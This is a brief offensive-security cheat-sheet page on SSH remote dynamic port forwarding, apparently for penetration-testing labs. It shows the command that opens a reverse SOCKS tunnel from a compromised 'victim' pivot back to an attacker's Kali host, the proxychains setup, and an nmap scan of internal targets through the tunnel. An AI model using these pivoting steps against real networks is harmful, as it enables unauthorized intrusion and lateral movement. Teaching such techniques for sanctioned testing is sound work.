>_ shadow.red

SSH Remote Dynamic Port Forwarding

Everywhere Tunnels SSH Tunneling linux

Combines remote forwarding (initiated from the victim outbound) with the flexibility of a SOCKS proxy. Requires OpenSSH 7.6+ on the client.

From the pivot

ssh -N -R 8877 kali@192.168.118.12

-R 8877 (no full socket spec) means SOCKS proxy listening on Kali port 8877.

Verify on Kali

sudo ss -ntplu

proxychains config

[ProxyList]
socks5 127.0.0.1 8877

Scan internal targets through it

proxychains nmap -vvv -sT --top-ports=20 -Pn 10.8.20.50